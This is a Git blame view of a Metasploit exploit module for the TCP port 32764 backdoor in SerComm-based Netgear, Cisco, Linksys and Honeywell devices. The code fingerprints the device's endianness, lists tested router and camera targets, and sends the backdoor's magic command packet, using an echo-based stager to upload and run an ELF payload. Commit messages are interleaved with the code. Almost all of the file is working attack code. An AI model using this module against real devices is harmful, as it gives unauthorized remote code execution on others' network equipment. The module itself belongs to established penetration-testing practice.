infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/modules/exploits/linux/misc/sercomm_exec.rb

215 lines
5.8 KiB
Ruby
Raw Normal View History

Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
##
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
Rank = GreatRanking
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
include Msf::Exploit::Remote::Tcp
Update modules to use the new generic CMDstager mixin
2014-02-08 03:21:55 +00:00
include Msf::Exploit::CmdStager
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
def initialize(info={})
super(update_info(info,
'Name' => "SerComm Device Remote Code Execution",
'Description' => %q{
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
This module will cause remote code execution on several SerComm devices.
These devices typically include routers from NetGear and Linksys.
Update module description
2014-01-16 17:16:11 +00:00
This module was tested successfully against several NetGear, Honeywell
and Cisco devices.
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
],
'Payload' =>
{
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
'Space' => 10000, # Could be more, but this should be good enough
'DisableNops' => true
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
},
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
'Platform' => 'linux',
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
'Privileged' => false,
'Targets' =>
[
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
['Generic Linux MIPS Big Endian',
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
{
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV'
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
}
],
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
['Generic Linux MIPS Little Endian',
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
{
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
'Arch' => ARCH_MIPSLE,
'PackFormat' => 'NNN'
}
],
Add Manual targets to sercomm_exec
2014-01-16 18:44:14 +00:00
['Manual Linux MIPS Big Endian',
{
'Arch' => ARCH_MIPSBE
}
],
['Manual Linux MIPS Little Endian',
{
'Arch' => ARCH_MIPSLE
}
],
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
['Cisco WAP4410N',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'NNN',
}
],
['Honeywell WAP-PL2 IP Camera',
{
'Arch' => ARCH_MIPSLE,
'PackFormat' => 'VVV'
}
],
['Netgear DG834',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
Add Manual targets to sercomm_exec
2014-01-16 18:44:14 +00:00
'NoArgs' => true
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
}
],
['Netgear DG834G',
{
'Arch' => ARCH_MIPSLE,
'PackFormat' => 'VVV',
'PayloadEncode' => 'octal'
}
],
['Netgear DG834PN',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
'NoArgs' => true
}
],
['Netgear DGN1000',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
'NoArgs' => true
}
],
['Netgear DSG835',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'VVV',
'NoArgs' => true,
}
],
['Netgear WPNT834',
{
'Arch' => ARCH_MIPSBE,
'PackFormat' => 'NNN',
'UploadPath' => '/var',
'PayloadEncode' => 'octal'
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
}
Add Manual targets to sercomm_exec
2014-01-16 18:44:14 +00:00
]
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
],
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
'DefaultTarget' => 0,
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
'References' =>
[
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
[ 'OSVDB', '101653' ],
[ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
],
'DisclosureDate' => "Dec 31 2013" ))
register_options(
[
Delete commas
2014-01-09 14:01:11 +00:00
Opt::RPORT(32764)
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
], self.class)
Add Manual targets to sercomm_exec
2014-01-16 18:44:14 +00:00
register_advanced_options(
[
OptEnum.new('PACKFORMAT', [false, "Pack Format to use", 'VVV', ['VVV', 'NNN']]),
OptString.new('UPLOADPATH', [false, "Remote path to land the payload", "/tmp" ]),
OptBool.new('NOARGS', [false, "Don't use the echo -en parameters", false ]),
OptEnum.new('ENCODING', [false, "Payload encoding to use", 'hex', ['hex', 'octal']]),
], self.class)
Make cmdstager flavor explicit or from info Every module that uses cmdstager either passes the flavor as an option to the execute_cmdstager function or relies on the module / target info now.
2014-06-28 21:40:49 +00:00
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
end
def check
Delete parentheses
2014-01-09 21:17:13 +00:00
fprint = endian_fingerprint
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
case fprint
when 'BE'
Saving progress
2014-01-21 23:14:55 +00:00
vprint_status("Detected Big Endian")
Update some checks
2014-01-24 18:08:23 +00:00
return Msf::Exploit::CheckCode::Appears
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
when 'LE'
Saving progress
2014-01-21 23:14:55 +00:00
vprint_status("Detected Little Endian")
Update some checks
2014-01-24 18:08:23 +00:00
return Msf::Exploit::CheckCode::Appears
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
end
Saving progress
2014-01-21 23:14:55 +00:00
return Msf::Exploit::CheckCode::Safe
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
end
def exploit
Add Manual targets to sercomm_exec
2014-01-16 18:44:14 +00:00
if target.name =~ /Manual/
print_warning("Remember you can configure Manual targets with NOARGS, UPLOADPATH, ENCODING and PACK advanced options")
@no_args = datastore['NOARGS']
@upload_path = datastore['UPLOADPATH']
@encoding_format = datastore['ENCODING']
@pack_format = datastore['PACKFORMAT']
else
@no_args = target['NoArgs']
@upload_path = target['UploadPath']
@encoding_format = target['PayloadEncode']
@pack_format = target['PackFormat']
end
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
execute_cmdstager(
Add Manual targets to sercomm_exec
2014-01-16 18:44:14 +00:00
:noargs => @no_args,
:temp => @upload_path,
Update modules to use the new generic CMDstager mixin
2014-02-08 03:21:55 +00:00
:enc_format => @encoding_format,
:flavor => :echo
Sercomm Exploit module fixes Added targets for 8 specific targets that I've tested: Cisco WAP4410N, Honeywell WAP-PL2 IP Camera, Netgear DG834, Netgear DG834G, Netgear DG834PN, Netgear DGN1000, Netgear DSG835, Netgear WPNT834 Added functionality to the CmdStagerEcho mix-in to support encoding via octal instead of hex based on the :enc_type option. This is because many devices would not output hex encoded values properly. Added options on a per-target basis for the PackFormat (endian pack() values for communication), UploadPath (because /tmp wasn't always writable), and PayloadEncode (previously mentioned octal encoding option) Note for some reason, some devices communicate over one endianness, but then require a payload for the other endianess. I'm not sure what's causing this, but if those specific combinations are not used, the exploit fails. More research may be required for this.
2014-01-13 21:58:32 +00:00
)
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
end
Delete parentheses
2014-01-09 21:17:13 +00:00
def endian_fingerprint
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
begin
connect
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
sock.put(rand_text(5))
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
res = sock.get_once
disconnect
Delete parentheses
2014-01-09 21:17:13 +00:00
if res && res.start_with?("MMcS")
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
return 'BE'
Delete parentheses
2014-01-09 21:17:13 +00:00
elsif res && res.start_with?("ScMM")
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
return 'LE'
end
rescue Rex::ConnectionError => e
print_error("Connection failed: #{e.class}: #{e}")
end
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
return nil
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
end
def execute_command(cmd, opts)
# Get the length of the command, for the backdoor's command injection
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
cmd_length = cmd.length
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
Add minor fixes, mainly formatting
2014-01-09 13:51:42 +00:00
# 0x53634d4d => Backdoor code
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
# 0x07 => Exec command
# cmd_length => Length of command to execute, sent after communication struct
Add Manual targets to sercomm_exec
2014-01-16 18:44:14 +00:00
data = [0x53634d4d, 0x07, cmd_length].pack(@pack_format)
Code Review Feedback Migrated the Sercomm module to use the CmdStager mixin to provide uploading of the ELF binary. Modified the CmdStagerEcho mixin to allow bypass of the "-en " since in this case, the device messed up when it was used, and would actually write the "-en " to the file, from some flaky busybox version of "echo".
2014-01-09 03:21:32 +00:00
connect
# Send command structure followed by command text
sock.put(data+cmd)
disconnect
Rex.sleep(1)
end
end